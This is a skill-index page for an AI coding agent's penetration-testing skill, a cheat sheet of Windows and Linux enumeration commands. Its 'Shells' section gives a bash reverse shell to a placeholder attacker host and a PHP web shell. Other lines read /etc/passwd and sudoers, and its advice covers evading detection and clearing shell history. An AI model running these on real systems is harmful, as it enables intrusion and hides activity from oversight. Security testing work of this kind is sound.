OpenSkillIndex← back to search
claude-code

Secbot command-execution

install
source · Clone the upstream repo
git clone https://github.com/iammm0/secbot
Claude Code · Install into ~/.claude/skills/
T=$(mktemp -d) && git clone --depth=1 https://github.com/iammm0/secbot "$T" && mkdir -p ~/.claude/skills && cp -r "$T/skills/base/command-execution" ~/.claude/skills/iammm0-secbot-command-execution && rm -rf "$T"
manifest: skills/base/command-execution/SKILL.md
tags
#command#execution#terminal#shell#pentest
source content

Command Execution in Security Testing

Overview

This skill provides guidance on executing system commands effectively during penetration testing engagements.

Windows Commands

Network Discovery

# Local IP configuration
ipconfig /all

# Network connections
netstat -ano

# Active connections
netstat -ano | findstr ESTABLISHED

# ARP table
arp -a

# DNS lookup
nslookup target.com

Process Management

# List processes
tasklist /v

# Find specific process
tasklist | findstr python

# Kill process
taskkill /F /PID <pid>

File System

# List directory
dir /a /s

# Find files
dir /s /b *.exe

# File attributes
attrib

User & Group

# User accounts
net user

# Current user
whoami /all

# Local groups
net localgroup

# User info
net user <username>

Linux Commands

Network Discovery

# Network interfaces
ip addr show

# Listening ports
netstat -tulpn

# Active connections
ss -tulwn

# ARP table
arp -a

# DNS resolution
dig target.com

Process Management

# List processes
ps aux

# Find process
ps aux | grep python

# Kill process
kill -9 <pid>

# Process tree
pstree

File System

# Find executables
find / -perm -4000 2>/dev/null

# Recent files
find / -mtime -1 2>/dev/null

# SUID files
find / -perm -4000 -type f

User & Group

# Current user
id

# Sudoers
cat /etc/sudoers

# User accounts
cat /etc/passwd

# Groups
cat /etc/group

Security Testing Commands

Enumeration

# Service version detection
nmap -sV <target>

# OS detection
nmap -O <target>

# Vulnerability scripts
nmap --script vuln <target>

Web Testing

# curl basic
curl -v http://target

# POST request
curl -X POST -d "param=value" http://target

# SSL testing
curl -k https://target

Shells

# Reverse shell
bash -i >& /dev/tcp/attacker/port 0>&1

# Web shell upload test
echo "<?php system(\$_GET['cmd']); ?>" > shell.php

Best Practices

  1. Avoid Detection

    • Use encoded commands when possible
    • Limit command output visibility
    • Clear history after commands: 
      history -c

  2. Error Handling

    • Always check return codes
    • Redirect stderr: 
      2>&1
    • Use timeout for long-running commands

  3. Cross-Platform

    • Use portable commands when possible
    • Test commands in isolated environment first
    • Consider WSL for Linux tools on Windows

Timeout Recommendations

Command TypeRecommended Timeout
Quick check (ping, whoami)10s
Network scan60s
File search120s
Large transfer300s

Output Parsing

Extract specific information from command output:

# Get IP only
ipconfig | findstr "IPv4"

# Get specific field
netstat -ano | findstr :80

# Count results
netstat -ano | findstr ESTABLISHED | find /c /v ""